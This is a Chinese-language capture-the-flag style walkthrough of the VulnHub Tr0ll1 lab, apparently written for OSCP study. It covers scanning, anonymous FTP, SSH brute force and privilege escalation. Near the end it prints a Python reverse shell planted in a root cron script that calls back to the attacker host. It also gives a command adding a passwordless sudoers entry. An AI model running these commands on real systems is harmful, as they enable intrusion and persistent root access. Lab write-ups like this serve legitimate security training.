前言

oscp备考，oscp系列——Tr0ll1靶场，两种提权方式，ftp匿名登录，ssh爆破，ubuntu内核提权，计划任务
难度简单

• 对于低权限shell获取涉及：ftp匿名登录，ssh爆破
• 对于提权：ubuntu内核提权，计划任务
  下载地址：

https://www.vulnhub.com/entry/tr0ll-1,100/

nmap

主机存活

└─# nmap -sn 10.10.10.0/24                         
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-09 12:19 CST
Nmap scan report for 10.10.10.1
Host is up (0.00043s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.10.2
Host is up (0.00034s latency).
MAC Address: 00:50:56:F2:C6:98 (VMware)
Nmap scan report for 10.10.10.141
Host is up (0.00038s latency).
MAC Address: 00:0C:29:96:4F:09 (VMware)
Nmap scan report for 10.10.10.254
Host is up (0.00028s latency).
MAC Address: 00:50:56:FB:0C:2B (VMware)
Nmap scan report for 10.10.10.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.20 seconds

端口扫描

└─# nmap --min-rate 10000 -p- 10.10.10.141        
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-09 12:20 CST
Nmap scan report for 10.10.10.141
Host is up (0.0022s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:96:4F:09 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 6.03 seconds

详细端口扫描

└─# nmap -sV -sT -sC -O -p21,22,80 10.10.10.141     
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-09 12:21 CST
Nmap scan report for 10.10.10.141
Host is up (0.00060s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.10.128
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 600
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 09  2014 lol.pcap [NSE: writeable]
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|   256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_  256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_/secret
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:96:4F:09 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.61 seconds

vuln扫描

└─# nmap --script=vuln -p21,22,80 10.10.10.141
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-09 12:22 CST
Nmap scan report for 10.10.10.141
Host is up (0.00053s latency).

PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-enum: 
|   /robots.txt: Robots file
|_  /secret/: Potentially interesting folder
MAC Address: 00:0C:29:96:4F:09 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 321.30 seconds

信息收集

ftp，21

nmap扫描出来有匿名登录

下载下来查看一下

└─# strings lol.pcap         
Linux 3.12-kali1-486
Dumpcap 1.10.2 (SVN Rev 51934 from /trunk-1.10)
eth0	
host 10.0.0.6
Linux 3.12-kali1-486
220 (vsFTPd 3.0.2)
"USER anonymous
331 Please specify the password.
PASS password
230 Login successful.
SYST
215 UNIX Type: L8
PORT 10,0,0,12,173,198
200 PORT command successful. Consider using PASV.
LIST
150 Here comes the directory listing.
-rw-r--r--    1 0        0             147 Aug 10 00:38 secret_stuff.txt
226 Directory send OK.
TYPE I
W200 Switching to Binary mode.
PORT 10,0,0,12,202,172
g>	@
W200 PORT command successful. Consider using PASV.
RETR secret_stuff.txt
W150 Opening BINARY mode data connection for secret_stuff.txt (147 bytes).
WWell, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P
Sucks, you were so close... gotta TRY HARDER!
W226 Transfer complete.
TYPE A
O200 Switching to ASCII mode.
{PORT 10,0,0,12,172,74
O200 PORT command successful. Consider using PASV.
{LIST
O150 Here comes the directory listing.
O-rw-r--r--    1 0        0             147 Aug 10 00:38 secret_stuff.txt
O226 Directory send OK.
{QUIT
221 Goodbye.
Counters provided by dumpcap

发现存在目录/sup3rs3cr3tdirlol

web页面，80

查看一下源码，发现图片名字叫hacker，下载下来查看

查看源码没有发现什么有用的信息

目录扫描

和nmap扫描出来一样

/robots.txt

/secret/

/sup3rs3cr3tdirlol目录下载文件

发现目录0x0856BF

发现两个文件夹

可能是用户名的文件内容

maleus
ps-aux
felux
Eagle11
genphlux < -- Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow

可能是密码的文件内容

Good_job_:)

漏洞利用

ssh_226">ssh爆破

尝试ssh爆破

genphlux
usmc8892
blawrg
wytshadow
vis1t0r
overflow
maleus
ps-aux
felux
Eagle11
root

密码

Good_job_:)
good_job_:)
Pass.txt
password

成功得到账号密码

overflow/Pass.txt

ssh连接成功

提权

ubuntu_257">ubuntu内核提权

查看一下版本

overflow@troll:/$ uname -a
Linux troll 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 athlon i686 GNU/Linux
overflow@troll:/$ lsb_release
No LSB modules are available.
overflow@troll:/$ cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"
NAME="Ubuntu"
VERSION="14.04.1 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.1 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"

版本比较低，尝试内核提权，搜索一下，发现这个比较适合

尝试利用成功

获得root权限

计划任务

发现存在计划任务

find / -uid 0 -perm -o+w -type f 2>/dev/null | grep -v -E '/proc|/sys'
find / -name "*cronlog*" 2>/dev/null

得到

/lib/log/cleaner.py

使用vim写入一下反弹shell脚本

import socket,subprocess,os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.10.128",6666));os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
import pty
pty.spawn("/bin/bash")

也可以直接更改sudo权限为最高权限，然后直接sudo /bin/bash即可直接获取root权限

echo "overflow All=(All)NOPASSWD:ALL" >> /etc/sudoers